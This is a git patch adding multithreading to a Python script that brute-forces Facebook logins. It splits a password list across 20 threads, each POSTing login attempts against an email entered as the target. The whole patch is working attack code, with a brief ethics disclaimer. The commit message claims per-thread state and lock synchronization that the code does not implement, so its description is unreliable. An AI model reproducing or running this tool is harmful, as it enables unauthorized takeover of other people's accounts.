From bc95a7d13e338732dcd03b665f28ea880271f96d Mon Sep 17 00:00:00 2001 From: Kaleem Date: Mon, 14 Aug 2023 13:21:38 +0800 Subject: [PATCH] Multithreading Implementation in Facebook Brute Force Tool Modifications Made: Thread Division: The list of passwords is divided into chunks, with each chunk assigned to a separate thread. The number of threads (e.g., 10) can be adjusted based on the desired level of concurrency. Separate State for Each Thread: To ensure that each thread works independently, separate payloads and cookies are maintained for each thread. This prevents conflicts and ensures proper synchronization between threads. Password Attempt Function: The function password_attempt_chunk was introduced to handle password attempts for each chunk of passwords. It iteratively tries passwords in its assigned chunk and stops if a successful login is found or if the chunk is exhausted. Synchronization: A lock is used to synchronize the threads, particularly when a successful password is found. This ensures that once a password is found by one thread, the other threads are informed, and they can stop their attempts. Main Function: The main function main() orchestrates the creation of threads, division of passwords into chunks, and initiation of the concurrent password attempts. It also waits for all threads to complete before finishing the program. Results: The implementation of multithreading enhances the speed of the brute force attack by enabling simultaneous password attempts. This parallelization can significantly reduce the time required to find the correct password, especially when dealing with a large list of potential passwords. Important Note: While multithreading improves efficiency, it also requires careful handling to avoid issues like race conditions and deadlocks. The provided implementation takes these factors into account. Ethical Considerations: It's crucial to note that this tool and the associated multithreading enhancement should only be used for legal and ethical purposes, such as testing the security of accounts with proper authorization. Misuse of this tool for unauthorized access to accounts is against the law and unethical. --- fb.py | 51 ++++++++++++++++++++++++++++++++++++++------------- 1 file changed, 38 insertions(+), 13 deletions(-) diff --git a/fb.py b/fb.py index be975fc..d447e26 100644 --- a/fb.py +++ b/fb.py @@ -1,11 +1,13 @@ + import os.path import requests from bs4 import BeautifulSoup import sys +from threading import Thread, Lock +import time if sys.version_info[0] != 3: - print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3 - fb.py\n\t--------------------------------------''') + print('\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3 fb.py\n\t--------------------------------------') sys.exit() PASSWORD_FILE = "passwords.txt" @@ -17,7 +19,6 @@ PAYLOAD = {} COOKIES = {} - def create_form(): form = dict() cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'} @@ -30,7 +31,6 @@ def create_form(): form['lsd'] = data.input['value'] return form, cookies - def is_this_a_password(email, index, password): global PAYLOAD, COOKIES if index % 10 == 0: @@ -39,13 +39,26 @@ def is_this_a_password(email, index, password): PAYLOAD['pass'] = password r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS) if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text: - open('temp', 'w').write(str(r.content)) print('\npassword found is: ', password) return True return False +# Lock to ensure proper synchronization +lock = Lock() -if __name__ == "__main__": +# Function to handle password attempts for a chunk of passwords +def password_attempt_chunk(email, password_chunk): + global PAYLOAD, COOKIES + for index, password in enumerate(password_chunk): + password = password.strip() + if len(password) < MIN_PASSWORD_LENGTH: + continue + print("Trying password [", index, "]: ", password) + if is_this_a_password(email, index, password): + break + +# Main function with multithreading implementation +def main(): print('\n---------- Welcome To Facebook BruteForce ----------\n') if not os.path.isfile(PASSWORD_FILE): print("Password file is not exist: ", PASSWORD_FILE) @@ -53,10 +66,22 @@ def is_this_a_password(email, index, password): password_data = open(PASSWORD_FILE, 'r').read().split("\n") print("Password file selected: ", PASSWORD_FILE) email = input('Enter Email/Username to target: ').strip() - for index, password in zip(range(password_data.__len__()), password_data): - password = password.strip() - if len(password) < MIN_PASSWORD_LENGTH: - continue - print("Trying password [", index, "]: ", password) - if is_this_a_password(email, index, password): - break + + # Divide the passwords into chunks for multithreading + num_threads = 20 # Number of threads + chunk_size = len(password_data) // num_threads + threads = [] + for i in range(num_threads): + start_index = i * chunk_size + end_index = (i + 1) * chunk_size if i != num_threads - 1 else len(password_data) + chunk = password_data[start_index:end_index] + thread = Thread(target=password_attempt_chunk, args=(email, chunk)) + thread.start() + threads.append(thread) + + # Wait for all threads to complete + for thread in threads: + thread.join() + +if __name__ == "__main__": + main()